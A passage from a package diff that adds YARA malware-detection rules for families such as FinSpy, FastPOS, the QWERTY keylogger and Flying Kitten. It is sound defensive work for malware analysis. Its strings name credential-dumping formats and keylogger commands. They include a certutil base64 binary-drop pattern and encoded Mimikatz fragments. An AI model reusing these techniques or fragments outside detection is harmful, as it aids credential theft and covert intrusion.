+		//mov byte ptr [ebp - x] y, x: 0x10-0x1 y: 0-9,A-F
+		$s2 = { C6 45 F? (3?|4?) }
+
+	condition:
+		$s1 and #s2 == 16
+
+}
+
+rule FakeM_Generic {
+	meta:
+		description = "Detects FakeM malware samples"
+		author = "Florian Roth"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
+		date = "2016-01-25"
+		score = 85
+		hash1 = "631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3"
+		hash2 = "3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520"
+		hash3 = "53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60"
+		hash4 = "4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3"
+		hash5 = "7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8"
+		hash6 = "12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d"
+		hash7 = "9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5"
+		hash8 = "3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90"
+		hash9 = "41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33"
+		hash10 = "53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e"
+		hash11 = "523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b"
+	strings:
+		$a1 = "\\system32\\kernel32.dll" fullword ascii
+		$a2 = "\\boot.lnk" fullword ascii
+		$a3 = "%USERPROFILE%" fullword ascii /* Goodware String - occured 16 times */
+
+		$b1 = "Wizard.EXE" fullword wide
+		$b2 = "CommandLineA" fullword ascii
+
+		$c1 = "\\system32\\kernel32.dll" fullword ascii
+		$c2 = "\\aapz.tmp" fullword ascii
+
+		$e1 = "C:\\Documents and Settings\\A\\" fullword ascii
+		$e2 = "\\svchost.exe" fullword ascii
+		$e3 = "\\Perform\\Release\\Perform.pdb" fullword ascii
+
+		$f1 = "Browser.EXE" fullword wide
+		$f2 = "\\browser.exe" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 100KB and
+		( all of ($a*) or all of ($b*) or all of ($c*) or all of ($e*) or 1 of ($f*) )
+}
diff -Nru remnux-rules-0.0.3/yara/malware/FastPOS.yar remnux-rules-0.0.4/yara/malware/FastPOS.yar
--- remnux-rules-0.0.3/yara/malware/FastPOS.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/FastPOS.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule PoS_Malware_fastpos : FastPOS
+{
+meta:
+author = "Trend Micro, Inc."
+date = "2016-05-18"
+description = "Used to detect FastPOS keyloggger + scraper"
+reference = "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf"
+sample_filetype = "exe"
+strings:
+$string1 = "uniqyeidclaxemain"
+$string2 = "http://%s/cdosys.php"
+$string3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
+$string4 = "\\The Hook\\Release\\The Hook.pdb" nocase
+condition:
+all of ($string*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/favorite.yar remnux-rules-0.0.4/yara/malware/favorite.yar
--- remnux-rules-0.0.3/yara/malware/favorite.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/favorite.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,38 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FavoriteCode : Favorite Family 
+{
+    meta:
+        description = "Favorite code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+    
+    strings:
+        // standard string hiding
+        $ = { C6 45 ?? 3B C6 45 ?? 27 C6 45 ?? 34 C6 45 ?? 75 C6 45 ?? 6B C6 45 ?? 6C C6 45 ?? 3B C6 45 ?? 2F }
+        $ = { C6 45 ?? 6F C6 45 ?? 73 C6 45 ?? 73 C6 45 ?? 76 C6 45 ?? 63 C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 }
+    
+    condition:
+        any of them
+}
+
+rule FavoriteStrings : Favorite Family
+{
+    meta:
+        description = "Favorite Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+        
+    strings:
+        $string1 = "!QAZ4rfv"
+        $file1 = "msupdater.exe"
+        $file2 = "FAVORITES.DAT"
+        
+    condition:
+       any of ($string*) or all of ($file*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/FinSpy.yar remnux-rules-0.0.4/yara/malware/FinSpy.yar
--- remnux-rules-0.0.3/yara/malware/FinSpy.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/FinSpy.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,138 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FinSpy_2
+{
+    meta:
+        description = "FinFisher FinSpy"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $password1 = /\/scomma kbd101\.sys/ wide ascii
+        $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
+        $password3 = /\/scomma excel2010\.part/ wide ascii
+        $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
+        $password5 = /\/stab MSVCR32\.manifest/ wide ascii
+        $password6 = /\/scomma MSN2010\.dll/ wide ascii
+        $password7 = /\/scomma Firefox\.base/ wide ascii
+        $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
+        $password9 = /\/scomma IE7setup\.sys/ wide ascii
+        $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
+        $password11 = /\/scomma office2007\.cab/ wide ascii
+        $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
+        $password13 = /\/scomma outlook2007\.dll/ wide ascii
+        $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
+
+        $screenrec1 = /(s)111o00000000\.dat/ wide ascii
+        $screenrec2 = /(t)111o00000000\.dat/ wide ascii
+        $screenrec3 = /(f)113o00000000\.dat/ wide ascii
+        $screenrec4 = /(w)114o00000000\.dat/ wide ascii
+        $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
+        $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
+        $screenrec7 = /(v)112O00000000\.dat/ wide ascii
+
+        //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
+        //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
+
+        $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
+
+        $skyperec1 = /\[%19s\] %25s\:    %s/ wide ascii
+        $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
+        $skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
+
+        $mouserec1 = /(m)sc183Q000\.dat/ wide ascii
+        $mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
+
+        $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
+
+        $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
+        $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
+
+        $versions1 = /(f)inspyv2/ nocase
+        $versions2 = /(f)inspyv4/ nocase
+
+        $bootkit1 = /(b)ootkit_x32driver/
+        $bootkit2 = /(b)ootkit_x64driver/
+
+        $typo1 = /(S)creenShort Recording/ wide
+
+        $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
+
+    condition:
+        8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or any of ($mouserec*) or $driver or any of ($janedow*) or any of ($versions*) or any of ($bootkit*) or $typo1 or $mssounddx
+}
+
+rule FinSpy
+{
+    meta:
+        description = "FinFisher FinSpy"
+        author = "AlienVault Labs"
+
+    strings:
+        $filter1 = "$password14"
+        $filter2 = "$screenrec7"
+        $filter3 = "$micrec"
+        $filter4 = "$skyperec3"
+        $filter5 = "$mouserec2"
+        $filter6 = "$driver"
+        $filter7 = "$janedow2"
+        $filter8 = "$bootkit2"
+
+        $password1 = /\/scomma kbd101\.sys/ wide ascii
+        $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
+        $password3 = /\/scomma excel2010\.part/ wide ascii
+        $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
+        $password5 = /\/stab MSVCR32\.manifest/ wide ascii
+        $password6 = /\/scomma MSN2010\.dll/ wide ascii
+        $password7 = /\/scomma Firefox\.base/ wide ascii
+        $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
+        $password9 = /\/scomma IE7setup\.sys/ wide ascii
+        $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
+        $password11 = /\/scomma office2007\.cab/ wide ascii
+        $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
+        $password13 = /\/scomma outlook2007\.dll/ wide ascii
+        $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
+
+        $screenrec1 = /(s)111o00000000\.dat/ wide ascii
+        $screenrec2 = /(t)111o00000000\.dat/ wide ascii
+        $screenrec3 = /(f)113o00000000\.dat/ wide ascii
+        $screenrec4 = /(w)114o00000000\.dat/ wide ascii
+        $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
+        $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
+        $screenrec7 = /(v)112O00000000\.dat/ wide ascii
+
+        //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
+        //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
+
+        $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
+
+        $skyperec1 = /\[%19s\] %25s\:    %s/ wide ascii
+        $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
+        //$skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
+
+        //$mouserec1 = /(m)sc183Q000\.dat/ wide ascii
+        //$mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
+
+        $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
+
+        $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
+        $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
+
+        //$versions1 = /(f)inspyv2/ nocase
+        //$versions2 = /(f)inspyv4/ nocase
+
+        $bootkit1 = /(b)ootkit_x32driver/
+        $bootkit2 = /(b)ootkit_x64driver/
+
+        $typo1 = /(S)creenShort Recording/ wide
+
+        $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
+
+    condition:
+        (8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or $driver or any of ($janedow*) or any of ($bootkit*) or $typo1 or $mssounddx) and not any of ($filter*)
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/FiveEyes.yar remnux-rules-0.0.4/yara/malware/FiveEyes.yar
--- remnux-rules-0.0.3/yara/malware/FiveEyes.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/FiveEyes.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,241 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+/* FIVE EYES ------------------------------------------------------------------------------- */
+
+rule FiveEyes_QUERTY_Malwareqwerty_20121 {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20121.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
+	strings:
+		$s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20121.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
+	condition:
+		9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_sys {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
+	strings:
+		$s0 = "20123.dll" fullword ascii
+		$s1 = "kbdclass.sys" fullword wide
+		$s2 = "IoFreeMdl" fullword ascii
+		$s3 = "ntoskrnl.exe" fullword ascii
+		$s4 = "KfReleaseSpinLock" fullword ascii
+	condition:
+		all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_cmdDef {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
+	strings:
+		$s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
+		$s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
+		$s2 = "<commands/>" fullword ascii
+		$s3 = "</version>" fullword ascii
+		$s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
+		$s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
+		$s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
+		$s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
+		$s8 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s9 = "<minorType>0</minorType>" fullword ascii
+		$s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
+		$s11 = "</comments>" fullword ascii
+		$s12 = "<comments>" fullword ascii
+		$s13 = "<majorType>1</majorType>" fullword ascii
+		$s14 = "<files>None</files>" fullword ascii
+		$s15 = "<poc>Erebus</poc>" fullword ascii
+		$s16 = "</plugin>" fullword ascii
+		$s17 = "<team>None</team>" fullword ascii
+		$s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
+		$s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
+		$s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
+	condition:
+		14 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_dll {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "89504d91c5539a366e153894c1bc17277116342b"
+	strings:
+		$s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
+		$s1 = "20121.dll" fullword ascii
+	condition:
+		all of them
+}
+rule FiveEyes_QUERTY_Malwareqwerty_20123 {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20123.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
+	strings:
+		$s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
+		$s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
+		$s2 = "<name>20123.sys</name>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
+		$s5 = "<platform type=\"1\">" fullword ascii
+		$s6 = "</plugin>" fullword ascii
+		$s7 = "</pluginConfig>" fullword ascii
+		$s8 = "<pluginConfig>" fullword ascii
+		$s9 = "</platform>" fullword ascii
+		$s10 = "</lpConfig>" fullword ascii
+		$s11 = "<lpConfig>" fullword ascii
+	condition:
+		9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20120_dll {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
+	strings:
+		$s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" fullword wide
+		$s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" fullword wide
+		$s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
+		$s3 = "- Log Used (number of windows) - %d" fullword wide
+		$s4 = "- Log Limit (number of windows) - %d" fullword wide
+		$s5 = "Process or User Default Language" fullword wide
+		$s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
+		$s7 = "- Logging of keystrokes is switched ON" fullword wide
+		$s8 = "- Logging of keystrokes is switched OFF" fullword wide
+		$s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
+		$s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
+		$s11 = "FAILED to get Qwerty Status" fullword wide
+		$s12 = "- Successfully retrieved Log from Implant." fullword wide
+		$s13 = "- Logging of all Windows is toggled ON" fullword wide
+		$s14 = "- Logging of all Windows is toggled OFF" fullword wide
+		$s15 = "Qwerty FAILED to retrieve window list." fullword wide
+		$s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide
+		$s17 = "The implant failed to return a valid status" fullword ascii
+		$s18 = "- Log files were NOT generated!" fullword wide
+		$s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
+		$s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
+	condition:
+		10 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20120_cmdDef {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
+	strings:
+		$s0 = "This PPC gets the current keystroke log." fullword ascii
+		$s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
+		$s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
+		$s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
+		$s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
+		$s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
+		$s6 = "<name>Get Keystroke Log</name>" fullword ascii
+		$s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
+		$s8 = "<definition>display help for this function</definition>" fullword ascii
+		$s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
+		$s10 = "Set the log limit (in number of windows)" fullword ascii
+		$s11 = "<example>qwgetlog</example>" fullword ascii
+		$s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
+		$s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
+		$s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
+		$s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
+		$s16 = "<command id=\"32\">" fullword ascii
+		$s17 = "<command id=\"3\">" fullword ascii
+		$s18 = "<command id=\"7\">" fullword ascii
+		$s19 = "<command id=\"1\">" fullword ascii
+		$s20 = "<command id=\"4\">" fullword ascii
+	condition:
+		10 of them
+}
+
+rule FiveEyes_QUERTY_Malwareqwerty_20120 {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20120.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "597082f05bfd3225587d480c30f54a7a1326a892"
+	strings:
+		$s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20120.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
+	condition:
+		all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_cmdDef {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
+	strings:
+		$s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
+		$s1 = "<message>Failed to get File Time</message>" fullword ascii
+		$s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
+		$s3 = "<message>Failed to set File Time</message>" fullword ascii
+		$s4 = "</commands>" fullword ascii
+		$s5 = "<commands>" fullword ascii
+		$s6 = "</version>" fullword ascii
+		$s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
+		$s8 = "<message>No Comms. with Driver</message>" fullword ascii
+		$s9 = "</error>" fullword ascii
+		$s10 = "<message>Invalid File Size</message>" fullword ascii
+		$s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
+		$s12 = "<message>File Size Mismatch</message>" fullword ascii
+		$s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
+		$s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
+		$s15 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
+		$s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
+		$s18 = "<minorType>0</minorType>" fullword ascii
+		$s19 = "<code>00001002</code>" fullword ascii
+		$s20 = "<code>00001001</code>" fullword ascii
+	condition:
+		12 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/FlyingKitten.yar remnux-rules-0.0.4/yara/malware/FlyingKitten.yar
--- remnux-rules-0.0.3/yara/malware/FlyingKitten.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/FlyingKitten.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FlyingKitten : rat
+{
+    meta:
+        Author      = "CrowdStrike, Inc"
+        Date        = "2014/05/13"
+        Description = "Flying Kitten RAT"
+        Reference   = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"
+
+    strings:
+        $classpath = "Stealer.Properties.Resources.resources"
+        $pdbstr = "\\Stealer\\obj\\x86\\Release\\Stealer.pdb"
+
+    condition:
+        all of them and uint16(0) == 0x5A4D and uint32(uint32(0x3c)) == 0x4550 and uint16(uint32(0x3C) + 0x16) & 0x2000 == 0 and ((uint16(uint32(0x3c)+24) == 0x010b and uint32(uint32(0x3c)+232) > 0) or (uint16(uint32(0x3c)+24) == 0x020b and uint32(uint32(0x3c)+248) > 0)) 
+
+}
+
+rule CSIT_14003_03 : installer
+{ 
+    meta:
+        Author      = "CrowdStrike, Inc"
+        Date        = "2014/05/13"
+        Description = "Flying Kitten Installer"
+        Reference   = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"
+
+    strings:
+        $exename = "IntelRapidStart.exe"
+        $confname = "IntelRapidStart.exe.config"
+        $cabhdr = { 4d 53 43 46 00 00 00 00 } 
+
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Gamarue.yar remnux-rules-0.0.4/yara/malware/Gamarue.yar
--- remnux-rules-0.0.3/yara/malware/Gamarue.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Gamarue.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,15 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Worm_Gamarue {
+	meta:
+		author = "Centro Criptológico Nacional (CCN)"
+		ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+		description = "Gamarue_Andromeda"		
+	strings:
+		$a = { 69 E1 2A B0 2D 80 44 E3 2D 80 44 E3 2D 80 44 E3 EE 8F 1B E3 2A 80 44 E3 EE 8F 19 E3 3A 80 44 E3 2D 80 45 E3 CD 81 44 E3 0A 46 39 E3 34 80 44 E3 0A 46 29 E3 A5 80 44 E3 0A 46 2A E3 5C 80 44 E3 0A 46 36 E3 2C 80 44 E3 0A 46 3C E3 2C 80 44 E3 }
+	condition:
+		$a 
+}
diff -Nru remnux-rules-0.0.3/yara/malware/general_cloaking.yar remnux-rules-0.0.4/yara/malware/general_cloaking.yar
--- remnux-rules-0.0.3/yara/malware/general_cloaking.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/general_cloaking.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,45 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+
+   Generic Cloaking
+
+   Florian Roth
+   BSK Consulting GmbH
+
+	License: Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)
+	Copyright and related rights waived via https://creativecommons.org/licenses/by-nc-sa/4.0/
+
+*/
+
+rule Binary_Drop_Certutil {
+	meta:
+		description = "Drop binary as base64 encoded cert trick"
+		author = "Florian Roth"
+		reference = "https://goo.gl/9DNn8q"
+		date = "2015-07-15"
+		score = 70
+	strings:
+		$s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
+		$s1 = "echo -----END CERTIFICATE----- >>" ascii
+		$s2 = "certutil -decode " ascii
+	condition:
+		filesize < 10KB and all of them
+}
+
+rule StegoKatz {
+	meta:
+		description = "Encoded Mimikatz in other file types"
+		author = "Florian Roth"
+		reference = "https://goo.gl/jWPBBY"
+		date = "2015-09-11"
+		score = 70
+	strings:
+		$s1 = "VC92Ny9TSXZMNk5jLy8vOUlqUTFVRlFNQTZMLysvdjlJaTh2L0ZUNXJBUUJJaTFRa1NFaUx6K2hWSS8vL1NJME44bklCQU9pZC92Ny9USTJjSkpBQUFBQXp3RW1MV3hCSmkyc1lTWXR6S0VtTDQxL0R6TXhNaTl4SmlWc0lUWWxMSUUySlF4aFZWbGRCVkVGVlFWWkJWMGlCN1BBQUFBQklnMlFrYUFDNE1BQUFBRW1MNkVTTmNPQ0pSQ1JnaVVRa1pFbU5RN0JKaTlsTWpRWFBGQU1BU0ls" ascii
+		$s2 = "Rpd3ovN3FlalVtNklLQ0xNNGtOV1BiY0VOVHROT0Zud25CWGN0WS9BcEdMR28rK01OWm85Nm9xMlNnY1U5aTgrSTBvNkFob1FOTzRHQWdtUElEVmlqald0Tk90b2FmN01ESWJUQkF5T0pYbTB4bFVHRTBZWEFWOXVoNHBkQnRrS0VFWWVBSEE2TDFzU0c5a2ZFTEc3QWd4WTBYY1l3ZzB6QUFXS09JZE9wQVhEK3lnS3lsR3B5Q1ljR1NJdFNseGZKWUlVVkNFdEZPVjRJUldERUl1QXpKZ2pCQWdsd0Va" ascii
+	condition:
+		filesize < 1000KB and 1 of them
+}
